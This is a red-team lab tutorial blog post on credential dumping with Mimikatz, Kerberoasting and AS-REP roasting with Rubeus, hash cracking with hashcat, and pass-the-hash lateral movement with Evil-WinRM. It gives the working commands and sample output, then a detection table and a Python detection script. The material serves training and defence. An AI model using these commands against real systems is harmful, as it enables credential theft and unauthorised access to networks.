Part 4: Credential Access with Mimikatz & Rubeus and Lateral Movement with Evil-WinRM
In this fourth installment of our red teaming blog series we pivot to credential access and abuse techniques. So far, we have established a foothold on our lab workstation test001 (user John) via a Covenant C2 Grunt agent. With that access (and the elevated privileges gained in the last part), we will dump credentials from memory with Mimikatz, perform Kerberos ticket attacks with Rubeus, and crack the resulting hashes on our attacker machine. Finally, we’ll reuse the stolen NTLM hash in a pass-the-hash attack to move laterally to another host (e.g. test002) via Evil-WinRM (Windows Remote Management).
Lab Environment Recap
| Component | Detail |
| --- | --- |
| Attacker | Commando VM (Windows 10) |
| C2 Framework | Covenant |
| Victim Machine | test001 (user: John) |
| Target Machine | test002 |
| Domain | LAB |
Dumping Credentials with Mimikatz
Step-by-Step:
- Launch Mimikatz in Covenant: Task > Select Grunt on test001 > Run:
  sekurlsa::logonPasswords
- Expected Output:

| Field | Value |
| --- | --- |
| Username | John |
| Domain | LAB |
| NTLM Hash | 5f8901d3e9c8d6f8e7ac… |
| Clear-text | (null) |

- Store the NTLM Hash: save it for pass-the-hash later or attempt to crack it offline.
Abusing Kerberos with Rubeus
Kerberoasting
- Command:
Rubeus.exe kerberoast /outfile:C:\Temp\kerberoast.txt /format:hashcat
- Sample Output:
$krb5tgs$23$*svc-db$LAB.LOCAL$SQLService/…*
- Purpose: the TGS hash can be cracked offline and reveals the service account’s password.
AS-REP Roasting
- Command:
Rubeus.exe asreproast /user:svc-backup /outfile:C:\Temp\asrep.txt /format:hashcat
- Sample Output:
$krb5asrep$23$svc-backup@LAB.LOCAL:…
Cracking Hashes on Commando VM
| Hash Type | Hashcat Mode | Example Command |
| --- | --- | --- |
| NTLM (John) | 1000 | hashcat -m 1000 john_hash.txt wordlist.txt |
| Kerberoast (RC4) | 13100 | hashcat -m 13100 kerberoast.txt wordlist.txt |
| AS-REP (RC4) | 18200 | hashcat -m 18200 asrep.txt wordlist.txt |
Lateral Movement with Evil-WinRM
Command:
evil-winrm -i test002 -u "John" -H 5F8901D3E9C8D6F8E7AC25B2CF9C3D92
What You Should See:
John@test002 C:\Users\John>
[Screenshot: sample Evil-WinRM session on test002, not reproduced here]
Blue Team Detection Summary
| Action | Windows Event | Defender Detection | Sentinel Hint |
| --- | --- | --- | --- |
| Mimikatz | 4688 (process) | Credential theft behavior | Process cmdline contains mimikatz strings |
| Kerberoasting | 4769 | Unusual TGS requests | High SPN request count per user |
| AS-REP Roasting | 4768 | Authentication without pre-auth | PreAuthType = 0 in logs |
| Scheduled Tasks | 4698 | Persistence alert | New task creation by unusual account |
| Evil-WinRM (PTH) | 4624, 4648 | NTLM PTH attempt | NTLM logon instead of Kerberos |
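The three Kerberos/NTLM rows of the table above as a small detection script, added here as an example (not part of the original post or of Defender/Sentinel). The events are constructed samples with Security-log field names, and the SPN threshold is an assumed value to tune per environment.

```python
"""Toy detections for the Kerberoasting, AS-REP roasting and PTH rows above."""
from collections import defaultdict

# Constructed sample events (not real logs); field names follow the
# Windows Security log as shown in Event Viewer for 4769 / 4768 / 4624.
EVENTS = [
    # Kerberoasting: one user requests RC4 (0x17) service tickets for many SPNs
    *[{"EventID": 4769, "TargetUserName": "john@LAB.LOCAL",
       "ServiceName": f"svc-{i}", "TicketEncryptionType": "0x17"} for i in range(6)],
    # Normal user: a single AES (0x12) service ticket
    {"EventID": 4769, "TargetUserName": "alice@LAB.LOCAL",
     "ServiceName": "cifs/fs01", "TicketEncryptionType": "0x12"},
    # AS-REP roasting: TGT request for an account with pre-authentication disabled
    {"EventID": 4768, "TargetUserName": "svc-backup", "PreAuthType": "0"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2"},
    # Pass-the-hash: network logon to test002 with NTLM instead of Kerberos
    {"EventID": 4624, "TargetUserName": "John", "TargetDomainName": "LAB",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "WorkstationName": "test002"},
    {"EventID": 4624, "TargetUserName": "alice", "TargetDomainName": "LAB",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "WorkstationName": "test002"},
]

SPN_THRESHOLD = 5  # assumed value: distinct RC4 SPNs per user before alerting


def detect(events, spn_threshold=SPN_THRESHOLD):
    """Return a list of (rule, account) findings for the three table rows."""
    findings = []
    rc4_spns = defaultdict(set)  # requesting user -> distinct SPNs asked for with RC4
    for e in events:
        eid = e["EventID"]
        if eid == 4769 and e.get("TicketEncryptionType") == "0x17":
            # RC4 service tickets are what Rubeus kerberoast requests
            rc4_spns[e["TargetUserName"]].add(e["ServiceName"])
        elif eid == 4768 and e.get("PreAuthType") == "0":
            # No pre-auth means the AS-REP can be cracked offline
            findings.append(("AS-REP roasting", e["TargetUserName"]))
        elif (eid == 4624 and e.get("LogonType") == "3"
              and e.get("AuthenticationPackageName") == "NTLM"
              and e.get("TargetDomainName") == "LAB"):  # assumption: domain accounts only
            # A domain account using NTLM over the network where Kerberos is expected
            findings.append(("NTLM pass-the-hash candidate", e["TargetUserName"]))
    for user, spns in rc4_spns.items():
        if len(spns) >= spn_threshold:
            findings.append(("Kerberoasting", user))
    return findings


if __name__ == "__main__":
    for rule, account in detect(EVENTS):
        print(f"[{rule}] {account}")
```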
Recap
- Dumped credentials with Mimikatz
- Extracted service account hashes using Rubeus
- Cracked hashes using Hashcat
- Moved laterally with Evil-WinRM using NTLM hashes
- Detected it all using Windows logs, Defender, and Sentinel
This lab is part of our ongoing training series based on the book:
Red Teaming and Blue Teaming with Microsoft Defender XDR
Stay tuned for the next part – we’ll dive into persistence at scale and evasion tactics to test your defenses further!
Thanks,
John Sr.